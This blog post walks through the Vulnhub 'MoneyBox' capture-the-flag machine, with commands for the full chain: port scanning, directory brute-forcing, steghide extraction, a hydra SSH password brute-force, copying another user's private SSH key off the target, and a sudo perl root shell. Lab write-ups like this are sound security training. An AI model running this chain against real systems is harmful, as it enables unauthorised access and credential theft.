NepCodeX

Byte Musings: Where Tech Meets Curiosity


MoneyBox Walkthrough – Vulnhub – Writeup

moneybox walkthrough writeup vulnhub

MoneyBox is an easy machine from Vulnhub. If you haven’t tried it yet, I suggest you do so. “MoneyBox Walkthrough – Vulnhub – Writeup”.

LInk to the machine: https://www.vulnhub.com/entry/moneybox-1,653/

Walkthrough of Alfa

From this machine, we can learn:

  1. Basic enumeration of HTTP
  2. Steganography using steghide
  3. Basics of SSH
  4. Abuse sudo to get root privilege escalation

Identify the target

First of all, I identified the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24
acae9ecb6a97435db8328773fb757c60

Scan open ports

Next, I scanned the open ports to identify the exposed services.

sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.53
4096ee89b8f94b6a84d2bc1e4eb3fc60

Here, we can see that we have anonymous FTP access. So, I logged into FTP.

Anonymous FTP access

lftp -u anonymous, 10.0.2.53
96018bbbb2b44e3cb715ff26bd9d6cd5

I downloaded the image to my local machine. Then, I tried extracting data using steghide and without a password but it gave me nothing.

steghide extract -sf trytofind.jpg

I also tried bruteforcing the password, it didn’t give me anything.

stegseek trytofind.jpg /home/kali/rockyou.txt

So, I might have to get the password for the steganography.

Enumerate the webserver

The default page doesn’t give anything.

b520cc2206f5443e8f0966794b13d74b

When I brute-forced the directory on the webserver, I found a path.

gobuster dir -u http://10.0.2.53 -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dir.log
309a24843bf14d249e5c9a10d3e4d45d

Upon curling the path, I found a hint.

curl -L 10.0.2.53/blogs
db68899fd67b4bb3b5ee29c132fa37d9

The path had a comment that suggested I visit a new path.

curl -L 10.0.2.53/S3cr3t-T3xt
86e8dbddbc844ce99abbf3cf52ea8db9

Here, we got the secret key that I could use to use in the steganography.

Steganography

Steganography is the way to hide data inside different files. Since we have an image of the extension jpg, we can guess that the image has used steghide for the steganography.

steghide extract -sf trytofind.jpg 
3772d2aef04a4ce69ed36837556bf42a

It wrote to a new file “data.txt”. The file had a hint for a username on the target.

cat data.txt
Hello.....  renu

      I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......

The file gives us the username as “renu”. Also, the password is weak. Therefore, we might want to bruteforce the password.

Bruteforce

hydra -l renu -P /home/kali/rockyou.txt 10.0.2.53 ssh
ed4d4a5ddcb84598b4a97c2c6dd756b6

We were able to crack the password. Hence, I logged in as renu and got the user flag.

ssh [email protected]
ls -al
cat user1.txt
71a7dc5a22344b6991d6744a57283342

Escalate to different user

When I listed the home directories, I found another user on the machine.

cd /home
ls -al
a6d786c1c78c45fe981c7e6c6e8b85fe

On the home page of lily, there is an SSH directory.

cd /home/lily
ls -al
cd .ssh
ls -al
cat authorized_keys
853902bbdb21461f915e31557e2f72d2

The SSH directory has a file authorized_keys that had the public SSH key of the user renu. This means, using the private key of the user, we can log as lily. There are two ways to do so. First, we can copy the private key of renu to our local machine and log into SSH from the local machine.

scp [email protected]:~/.ssh/id_rsa .

The above command will copy the id_rsa and its permissions. This is a better way than serving via an HTTP server. Now, we can log in.

ssh [email protected] -i .ssh/id_rsa

Alternatively, we can also switch to lily from the target machine itself.

cd
ssh lily@localhost -i .ssh/id_rsa
eab3055f4f764bd88199404826c9d344

From here, we can get the user flag.

cat user2.txt
b6dcecbb002d460bbed9611a05d0b333

Root privilege escalation

From lily, we can check the sudo permissions.

sudo -l
a82fb57f0f184d5abc549c5ed3b8be5a

We can see that the user can run perl command as all users. Therefore, we can now execute commands as any user.

References: https://gtfobins.github.io/gtfobins/perl/#sudo

sudo perl -e 'exec "/bin/bash";'
cd
ls -al
cat .root.txt
c339ad6e178043e08ec73e502f54b854


0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments